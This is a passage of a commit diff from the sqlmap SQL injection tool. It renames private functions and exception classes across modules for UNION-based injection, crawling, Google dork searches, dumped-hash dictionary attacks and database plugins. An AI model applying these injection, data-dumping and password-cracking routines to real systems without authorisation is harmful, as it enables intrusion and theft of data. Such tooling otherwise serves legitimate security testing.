SQL injection vulnerability. The test is done up to 50 columns SQL injection vulnerability. The test is done up to 50 columns
@ -264,10 +264,10 @@ def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix
if conf.uColsStop == conf.uColsStart: if conf.uColsStop == conf.uColsStart:
count = conf.uColsStart count = conf.uColsStart
else: else:
count = __findUnionCharCount(comment, place, parameter, value, prefix, suffix, PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE) count = _findUnionCharCount(comment, place, parameter, value, prefix, suffix, PAYLOAD.WHERE.ORIGINAL if isNullValue(kb.uChar) else PAYLOAD.WHERE.NEGATIVE)
if count: if count:
validPayload, vector = __unionConfirm(comment, place, parameter, prefix, suffix, count) validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)
if not all([validPayload, vector]) and not all([conf.uChar, conf.dbms]): if not all([validPayload, vector]) and not all([conf.uChar, conf.dbms]):
warnMsg = "if UNION based SQL injection is not detected, " warnMsg = "if UNION based SQL injection is not detected, "
@ -281,7 +281,7 @@ def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix
warnMsg += "(e.g. --union-char=1) " warnMsg += "(e.g. --union-char=1) "
else: else:
conf.uChar = kb.uChar = str(randomInt(2)) conf.uChar = kb.uChar = str(randomInt(2))
validPayload, vector = __unionConfirm(comment, place, parameter, prefix, suffix, count) validPayload, vector = _unionConfirm(comment, place, parameter, prefix, suffix, count)
if not conf.dbms: if not conf.dbms:
if not conf.uChar: if not conf.uChar:
@ -305,7 +305,7 @@ def unionTest(comment, place, parameter, value, prefix, suffix):
return return
kb.technique = PAYLOAD.TECHNIQUE.UNION kb.technique = PAYLOAD.TECHNIQUE.UNION
validPayload, vector = __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
if validPayload: if validPayload:
validPayload = agent.removePayloadDelimiters(validPayload) validPayload = agent.removePayloadDelimiters(validPayload)

22
lib/techniques/union/use.py
View File

@ -39,7 +39,7 @@ from lib.core.data import queries
from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.dicts import FROM_DUMMY_TABLE
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import SQL_SCALAR_REGEX
from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT
from lib.core.threads import getCurrentThreadData from lib.core.threads import getCurrentThreadData
@ -47,7 +47,7 @@ from lib.core.threads import runThreads
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
def __oneShotUnionUse(expression, unpack=True, limited=False): def _oneShotUnionUse(expression, unpack=True, limited=False):
retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as union data is stored raw unconverted retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as union data is stored raw unconverted
threadData = getCurrentThreadData() threadData = getCurrentThreadData()
@ -106,7 +106,7 @@ def __oneShotUnionUse(expression, unpack=True, limited=False):
return retVal return retVal
def configUnion(char=None, columns=None): def configUnion(char=None, columns=None):
def __configUnionChar(char): def _configUnionChar(char):
if not isinstance(char, basestring): if not isinstance(char, basestring):
return return
@ -115,7 +115,7 @@ def configUnion(char=None, columns=None):
if conf.uChar is not None: if conf.uChar is not None:
kb.uChar = char.replace("[CHAR]", conf.uChar if conf.uChar.isdigit() else "'%s'" % conf.uChar.strip("'")) kb.uChar = char.replace("[CHAR]", conf.uChar if conf.uChar.isdigit() else "'%s'" % conf.uChar.strip("'"))
def __configUnionCols(columns): def _configUnionCols(columns):
if not isinstance(columns, basestring): if not isinstance(columns, basestring):
return return
@ -126,17 +126,17 @@ def configUnion(char=None, columns=None):
colsStart, colsStop = columns, columns colsStart, colsStop = columns, columns
if not colsStart.isdigit() or not colsStop.isdigit(): if not colsStart.isdigit() or not colsStop.isdigit():
raise sqlmapSyntaxException, "--union-cols must be a range of integers" raise SqlmapSyntaxException, "--union-cols must be a range of integers"
conf.uColsStart, conf.uColsStop = int(colsStart), int(colsStop) conf.uColsStart, conf.uColsStop = int(colsStart), int(colsStop)
if conf.uColsStart > conf.uColsStop: if conf.uColsStart > conf.uColsStop:
errMsg = "--union-cols range has to be from lower to " errMsg = "--union-cols range has to be from lower to "
errMsg += "higher number of columns" errMsg += "higher number of columns"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
__configUnionChar(char) _configUnionChar(char)
__configUnionCols(conf.uCols or columns) _configUnionCols(conf.uCols or columns)
def unionUse(expression, unpack=True, dump=False): def unionUse(expression, unpack=True, dump=False):
""" """
@ -239,7 +239,7 @@ def unionUse(expression, unpack=True, dump=False):
_ = countedExpression.upper().rindex(" ORDER BY ") _ = countedExpression.upper().rindex(" ORDER BY ")
countedExpression = countedExpression[:_] countedExpression = countedExpression[:_]
output = __oneShotUnionUse(countedExpression, unpack) output = _oneShotUnionUse(countedExpression, unpack)
count = parseUnionPage(output) count = parseUnionPage(output)
if isNumPosStrValue(count): if isNumPosStrValue(count):
@ -300,7 +300,7 @@ def unionUse(expression, unpack=True, dump=False):
field = None field = None
limitedExpr = agent.limitQuery(num, expression, field) limitedExpr = agent.limitQuery(num, expression, field)
output = __oneShotUnionUse(limitedExpr, unpack, True) output = _oneShotUnionUse(limitedExpr, unpack, True)
if not kb.threadContinue: if not kb.threadContinue:
break break
@ -342,7 +342,7 @@ def unionUse(expression, unpack=True, dump=False):
if not value and not abortedFlag: if not value and not abortedFlag:
expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full union doesn't play well with ORDER BY expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full union doesn't play well with ORDER BY
value = __oneShotUnionUse(expression, unpack) value = _oneShotUnionUse(expression, unpack)
duration = calculateDeltaSeconds(start) duration = calculateDeltaSeconds(start)

4
lib/utils/checkpayload.py
View File

@ -14,7 +14,7 @@ from lib.core.data import logger
rules = None rules = None
def __adjustGrammar(string): def _adjustGrammar(string):
string = re.sub('\ADetects', 'Detected', string) string = re.sub('\ADetects', 'Detected', string)
string = re.sub('\Afinds', 'Found', string) string = re.sub('\Afinds', 'Found', string)
string = re.sub('attempts\Z', 'attempt', string) string = re.sub('attempts\Z', 'attempt', string)
@ -43,7 +43,7 @@ def checkPayload(payload):
for xmlrule in xmlrules.getElementsByTagName("filter"): for xmlrule in xmlrules.getElementsByTagName("filter"):
rule = "(?i)%s" % xmlrule.getElementsByTagName('rule')[0].childNodes[0].nodeValue rule = "(?i)%s" % xmlrule.getElementsByTagName('rule')[0].childNodes[0].nodeValue
desc = __adjustGrammar(xmlrule.getElementsByTagName('description')[0].childNodes[0].nodeValue) desc = _adjustGrammar(xmlrule.getElementsByTagName('description')[0].childNodes[0].nodeValue)
rules.append((rule, desc)) rules.append((rule, desc))
if payload: if payload:

4
lib/utils/crawler.py
View File

@ -17,7 +17,7 @@ from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
from lib.core.threads import getCurrentThreadData from lib.core.threads import getCurrentThreadData
from lib.core.threads import runThreads from lib.core.threads import runThreads
@ -50,7 +50,7 @@ class Crawler(object):
try: try:
if current: if current:
content = Request.getPage(url=current, crawling=True, raise404=False)[0] content = Request.getPage(url=current, crawling=True, raise404=False)[0]
except sqlmapConnectionException, e: except SqlmapConnectionException, e:
errMsg = "connection exception detected (%s). skipping " % e errMsg = "connection exception detected (%s). skipping " % e
errMsg += "url '%s'" % current errMsg += "url '%s'" % current
logger.critical(errMsg) logger.critical(errMsg)

10
lib/utils/google.py
View File

@ -16,8 +16,8 @@ from lib.core.common import getUnicode
from lib.core.common import urlencode from lib.core.common import urlencode
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.exception import sqlmapGenericException from lib.core.exception import SqlmapGenericException
from lib.core.settings import GOOGLE_REGEX from lib.core.settings import GOOGLE_REGEX
from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNICODE_ENCODING
from lib.request.basic import decodePage from lib.request.basic import decodePage
@ -43,7 +43,7 @@ class Google(object):
e.info() e.info()
except urllib2.URLError: except urllib2.URLError:
errMsg = "unable to connect to Google" errMsg = "unable to connect to Google"
raise sqlmapConnectionException, errMsg raise SqlmapConnectionException, errMsg
def search(self, dork): def search(self, dork):
""" """
@ -93,13 +93,13 @@ class Google(object):
return None return None
except (urllib2.URLError, socket.error, socket.timeout): except (urllib2.URLError, socket.error, socket.timeout):
errMsg = "unable to connect to Google" errMsg = "unable to connect to Google"
raise sqlmapConnectionException, errMsg raise SqlmapConnectionException, errMsg
retVal = [urllib.unquote(match.group(1)) for match in re.finditer(GOOGLE_REGEX, page, re.I | re.S)] retVal = [urllib.unquote(match.group(1)) for match in re.finditer(GOOGLE_REGEX, page, re.I | re.S)]
if not retVal and "detected unusual traffic" in page: if not retVal and "detected unusual traffic" in page:
warnMsg = "Google has detected 'unusual' traffic from " warnMsg = "Google has detected 'unusual' traffic from "
warnMsg += "this computer disabling further searches" warnMsg += "this computer disabling further searches"
raise sqlmapGenericException, warnMsg raise SqlmapGenericException, warnMsg
return retVal return retVal

20
lib/utils/hash.py
View File

@ -51,8 +51,8 @@ from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import HASH from lib.core.enums import HASH
from lib.core.exception import sqlmapFilePathException from lib.core.exception import SqlmapFilePathException
from lib.core.exception import sqlmapUserQuitException from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import COMMON_PASSWORD_SUFFIXES from lib.core.settings import COMMON_PASSWORD_SUFFIXES
from lib.core.settings import COMMON_USER_COLUMNS from lib.core.settings import COMMON_USER_COLUMNS
from lib.core.settings import DUMMY_USER_PREFIX from lib.core.settings import DUMMY_USER_PREFIX
@ -394,7 +394,7 @@ def attackDumpedTable():
if test[0] in ("n", "N"): if test[0] in ("n", "N"):
return return
elif test[0] in ("q", "Q"): elif test[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
results = dictionaryAttack(attack_dict) results = dictionaryAttack(attack_dict)
lut = dict() lut = dict()
@ -436,7 +436,7 @@ def hashRecognition(value):
return retVal return retVal
def __bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist): def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc_count, wordlists, custom_wordlist):
count = 0 count = 0
rotator = 0 rotator = 0
hashes = set([item[0][1] for item in attack_info]) hashes = set([item[0][1] for item in attack_info])
@ -505,7 +505,7 @@ def __bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, pro
if hasattr(proc_count, 'value'): if hasattr(proc_count, 'value'):
proc_count.value -= 1 proc_count.value -= 1
def __bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist): def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist):
count = 0 count = 0
rotator = 0 rotator = 0
@ -677,7 +677,7 @@ def dictionaryAttack(attack_dict):
kb.wordlists = dictPaths kb.wordlists = dictPaths
except sqlmapFilePathException, msg: except SqlmapFilePathException, msg:
warnMsg = "there was a problem while loading dictionaries" warnMsg = "there was a problem while loading dictionaries"
warnMsg += " ('%s')" % msg warnMsg += " ('%s')" % msg
logger.critical(warnMsg) logger.critical(warnMsg)
@ -719,7 +719,7 @@ def dictionaryAttack(attack_dict):
count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) count = _multiprocessing.Value('i', _multiprocessing.cpu_count())
for i in xrange(_multiprocessing.cpu_count()): for i in xrange(_multiprocessing.cpu_count()):
p = _multiprocessing.Process(target=__bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist)) p = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist))
processes.append(p) processes.append(p)
for p in processes: for p in processes:
@ -734,7 +734,7 @@ def dictionaryAttack(attack_dict):
singleTimeWarnMessage(warnMsg) singleTimeWarnMessage(warnMsg)
retVal = Queue() retVal = Queue()
__bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist) _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist)
except KeyboardInterrupt: except KeyboardInterrupt:
print print
@ -797,7 +797,7 @@ def dictionaryAttack(attack_dict):
count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) count = _multiprocessing.Value('i', _multiprocessing.cpu_count())
for i in xrange(_multiprocessing.cpu_count()): for i in xrange(_multiprocessing.cpu_count()):
p = _multiprocessing.Process(target=__bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist)) p = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist))
processes.append(p) processes.append(p)
for p in processes: for p in processes:
@ -820,7 +820,7 @@ def dictionaryAttack(attack_dict):
found_ = Value() found_ = Value()
found_.value = False found_.value = False
__bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist) _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist)
found = found_.value found = found_.value

4
lib/utils/hashdb.py
View File

@ -15,7 +15,7 @@ from lib.core.common import getUnicode
from lib.core.common import serializeObject from lib.core.common import serializeObject
from lib.core.common import unserializeObject from lib.core.common import unserializeObject
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapDataException from lib.core.exception import SqlmapDataException
from lib.core.settings import HASHDB_FLUSH_RETRIES from lib.core.settings import HASHDB_FLUSH_RETRIES
from lib.core.settings import HASHDB_FLUSH_THRESHOLD from lib.core.settings import HASHDB_FLUSH_THRESHOLD
from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNICODE_ENCODING
@ -39,7 +39,7 @@ class HashDB(object):
except Exception, ex: except Exception, ex:
errMsg = "error occurred while opening a session " errMsg = "error occurred while opening a session "
errMsg += "file '%s' ('%s')" % (self.filepath, ex) errMsg += "file '%s' ('%s')" % (self.filepath, ex)
raise sqlmapDataException, errMsg raise SqlmapDataException, errMsg
return threadData.hashDBCursor return threadData.hashDBCursor

8
lib/utils/pivotdumptable.py
View File

@ -18,8 +18,8 @@ from lib.core.data import logger
from lib.core.data import queries from lib.core.data import queries
from lib.core.enums import CHARSET_TYPE from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import MAX_INT from lib.core.settings import MAX_INT
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
from lib.request import inject from lib.request import inject
@ -83,7 +83,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
if not validColumnList: if not validColumnList:
errMsg = "all column name(s) provided are non-existent" errMsg = "all column name(s) provided are non-existent"
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
if not validPivotValue: if not validPivotValue:
warnMsg = "no proper pivot column provided (with unique values)." warnMsg = "no proper pivot column provided (with unique values)."
@ -139,7 +139,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
warnMsg += "will display partial output" warnMsg += "will display partial output"
logger.warn(warnMsg) logger.warn(warnMsg)
except sqlmapConnectionException, e: except SqlmapConnectionException, e:
errMsg = "connection exception detected. sqlmap " errMsg = "connection exception detected. sqlmap "
errMsg += "will display partial output" errMsg += "will display partial output"
errMsg += "'%s'" % e errMsg += "'%s'" % e

10
plugins/dbms/access/connector.py
View File

@ -14,8 +14,8 @@ import logging
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.core.settings import IS_WIN from lib.core.settings import IS_WIN
from plugins.generic.connector import Connector as GenericConnector from plugins.generic.connector import Connector as GenericConnector
@ -35,7 +35,7 @@ class Connector(GenericConnector):
if not IS_WIN: if not IS_WIN:
errMsg = "currently, direct connection to Microsoft Access database(s) " errMsg = "currently, direct connection to Microsoft Access database(s) "
errMsg += "is restricted to Windows platforms" errMsg += "is restricted to Windows platforms"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
self.initConnection() self.initConnection()
self.checkFileDb() self.checkFileDb()
@ -43,7 +43,7 @@ class Connector(GenericConnector):
try: try:
self.connector = pyodbc.connect('Driver={Microsoft Access Driver (*.mdb)};Dbq=%s;Uid=Admin;Pwd=;' % self.db) self.connector = pyodbc.connect('Driver={Microsoft Access Driver (*.mdb)};Dbq=%s;Uid=Admin;Pwd=;' % self.db)
except (pyodbc.Error, pyodbc.OperationalError), msg: except (pyodbc.Error, pyodbc.OperationalError), msg:
raise sqlmapConnectionException, msg[1] raise SqlmapConnectionException, msg[1]
self.setCursor() self.setCursor()
self.connected() self.connected()
@ -61,7 +61,7 @@ class Connector(GenericConnector):
except (pyodbc.OperationalError, pyodbc.ProgrammingError), msg: except (pyodbc.OperationalError, pyodbc.ProgrammingError), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
except pyodbc.Error, msg: except pyodbc.Error, msg:
raise sqlmapConnectionException, msg[1] raise SqlmapConnectionException, msg[1]
self.connector.commit() self.connector.commit()

6
plugins/dbms/access/filesystem.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
@ -14,8 +14,8 @@ class Filesystem(GenericFilesystem):
def readFile(self, rFile): def readFile(self, rFile):
errMsg = "on Microsoft Access it is not possible to read files" errMsg = "on Microsoft Access it is not possible to read files"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def writeFile(self, wFile, dFile, fileType=None): def writeFile(self, wFile, dFile, fileType=None):
errMsg = "on Microsoft Access it is not possible to write files" errMsg = "on Microsoft Access it is not possible to write files"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg

12
plugins/dbms/access/fingerprint.py
View File

@ -27,7 +27,7 @@ class Fingerprint(GenericFingerprint):
def __init__(self): def __init__(self):
GenericFingerprint.__init__(self, DBMS.ACCESS) GenericFingerprint.__init__(self, DBMS.ACCESS)
def __sandBoxCheck(self): def _sandBoxCheck(self):
# Reference: http://milw0rm.com/papers/198 # Reference: http://milw0rm.com/papers/198
retVal = None retVal = None
table = None table = None
@ -43,7 +43,7 @@ class Fingerprint(GenericFingerprint):
return retVal return retVal
def __sysTablesCheck(self): def _sysTablesCheck(self):
infoMsg = "executing system table(s) existence fingerprint" infoMsg = "executing system table(s) existence fingerprint"
logger.info(infoMsg) logger.info(infoMsg)
@ -85,7 +85,7 @@ class Fingerprint(GenericFingerprint):
return None return None
def __getDatabaseDir(self): def _getDatabaseDir(self):
retVal = None retVal = None
infoMsg = "searching for database directory" infoMsg = "searching for database directory"
@ -126,7 +126,7 @@ class Fingerprint(GenericFingerprint):
value += DBMS.ACCESS value += DBMS.ACCESS
return value return value
actVer = Format.getDbms() + " (%s)" % (self.__sandBoxCheck()) actVer = Format.getDbms() + " (%s)" % (self._sandBoxCheck())
blank = " " * 15 blank = " " * 15
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
@ -144,7 +144,7 @@ class Fingerprint(GenericFingerprint):
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
value += "\ndatabase directory: '%s'" % self.__getDatabaseDir() value += "\ndatabase directory: '%s'" % self._getDatabaseDir()
return value return value
@ -178,7 +178,7 @@ class Fingerprint(GenericFingerprint):
infoMsg = "actively fingerprinting %s" % DBMS.ACCESS infoMsg = "actively fingerprinting %s" % DBMS.ACCESS
logger.info(infoMsg) logger.info(infoMsg)
version = self.__sysTablesCheck() version = self._sysTablesCheck()
if version is not None: if version is not None:
Backend.setVersion(version) Backend.setVersion(version)

6
plugins/dbms/access/syntax.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from plugins.generic.syntax import Syntax as GenericSyntax from plugins.generic.syntax import Syntax as GenericSyntax
class Syntax(GenericSyntax): class Syntax(GenericSyntax):
@ -24,7 +24,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find("'") index = expression[firstIndex:].find("'")
if index == -1: if index == -1:
raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression raise SqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
lastIndex = firstIndex + index lastIndex = firstIndex + index
old = "'%s'" % expression[firstIndex:lastIndex] old = "'%s'" % expression[firstIndex:lastIndex]
@ -56,7 +56,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find(")") index = expression[firstIndex:].find(")")
if index == -1: if index == -1:
raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression raise SqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
lastIndex = firstIndex + index + 1 lastIndex = firstIndex + index + 1
old = expression[firstIndex:lastIndex] old = expression[firstIndex:lastIndex]

10
plugins/dbms/access/takeover.py
View File

@ -5,7 +5,7 @@ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.takeover import Takeover as GenericTakeover from plugins.generic.takeover import Takeover as GenericTakeover
class Takeover(GenericTakeover): class Takeover(GenericTakeover):
@ -14,18 +14,18 @@ class Takeover(GenericTakeover):
def osCmd(self): def osCmd(self):
errMsg = "on Microsoft Access it is not possible to execute commands" errMsg = "on Microsoft Access it is not possible to execute commands"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osShell(self): def osShell(self):
errMsg = "on Microsoft Access it is not possible to execute commands" errMsg = "on Microsoft Access it is not possible to execute commands"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osPwn(self): def osPwn(self):
errMsg = "on Microsoft Access it is not possible to establish an " errMsg = "on Microsoft Access it is not possible to establish an "
errMsg += "out-of-band connection" errMsg += "out-of-band connection"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def osSmb(self): def osSmb(self):
errMsg = "on Microsoft Access it is not possible to establish an " errMsg = "on Microsoft Access it is not possible to establish an "
errMsg += "out-of-band connection" errMsg += "out-of-band connection"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg

6
plugins/dbms/db2/connector.py
View File

@ -14,7 +14,7 @@ import logging
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector from plugins.generic.connector import Connector as GenericConnector
class Connector(GenericConnector): class Connector(GenericConnector):
@ -35,7 +35,7 @@ class Connector(GenericConnector):
database = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port) database = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port)
self.connector = ibm_db_dbi.connect(database, self.user, self.password) self.connector = ibm_db_dbi.connect(database, self.user, self.password)
except ibm_db_dbi.OperationalError, msg: except ibm_db_dbi.OperationalError, msg:
raise sqlmapConnectionException, msg raise SqlmapConnectionException, msg
self.setCursor() self.setCursor()
@ -54,7 +54,7 @@ class Connector(GenericConnector):
except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg: except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
except ibm_db_dbi.InternalError, msg: except ibm_db_dbi.InternalError, msg:
raise sqlmapConnectionException, msg[1] raise SqlmapConnectionException, msg[1]
self.connector.commit() self.connector.commit()

4
plugins/dbms/db2/fingerprint.py
View File

@ -23,7 +23,7 @@ class Fingerprint(GenericFingerprint):
def __init__(self): def __init__(self):
GenericFingerprint.__init__(self, DBMS.DB2) GenericFingerprint.__init__(self, DBMS.DB2)
def __versionCheck(self): def _versionCheck(self):
minor, major = None, None minor, major = None, None
for version in reversed(xrange(5, 15)): for version in reversed(xrange(5, 15)):
@ -97,7 +97,7 @@ class Fingerprint(GenericFingerprint):
logMsg = "confirming %s" % DBMS.DB2 logMsg = "confirming %s" % DBMS.DB2
logger.info(logMsg) logger.info(logMsg)
version = self.__versionCheck() version = self._versionCheck()
if version: if version:
Backend.setVersion(version) Backend.setVersion(version)

6
plugins/dbms/db2/syntax.py
View File

@ -6,7 +6,7 @@ See the file 'doc/COPYING' for copying permission
""" """
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from plugins.generic.syntax import Syntax as GenericSyntax from plugins.generic.syntax import Syntax as GenericSyntax
class Syntax(GenericSyntax): class Syntax(GenericSyntax):
@ -25,7 +25,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find("'") index = expression[firstIndex:].find("'")
if index == -1: if index == -1:
raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression raise SqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
lastIndex = firstIndex + index lastIndex = firstIndex + index
old = "'%s'" % expression[firstIndex:lastIndex] old = "'%s'" % expression[firstIndex:lastIndex]
@ -55,7 +55,7 @@ class Syntax(GenericSyntax):
index = expression[firstIndex:].find(")") index = expression[firstIndex:].find(")")
if index == -1: if index == -1:
raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression raise SqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
lastIndex = firstIndex + index + 1 lastIndex = firstIndex + index + 1
old = expression[firstIndex:lastIndex] old = expression[firstIndex:lastIndex]

6
plugins/dbms/firebird/connector.py
View File

@ -14,7 +14,7 @@ import logging
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNICODE_ENCODING
from plugins.generic.connector import Connector as GenericConnector from plugins.generic.connector import Connector as GenericConnector
@ -42,7 +42,7 @@ class Connector(GenericConnector):
self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), \ self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), \
user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") #http://www.daniweb.com/forums/thread248499.html user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") #http://www.daniweb.com/forums/thread248499.html
except kinterbasdb.OperationalError, msg: except kinterbasdb.OperationalError, msg:
raise sqlmapConnectionException, msg[1] raise SqlmapConnectionException, msg[1]
self.setCursor() self.setCursor()
self.connected() self.connected()
@ -59,7 +59,7 @@ class Connector(GenericConnector):
except kinterbasdb.OperationalError, msg: except kinterbasdb.OperationalError, msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
except kinterbasdb.Error, msg: except kinterbasdb.Error, msg:
raise sqlmapConnectionException, msg[1] raise SqlmapConnectionException, msg[1]
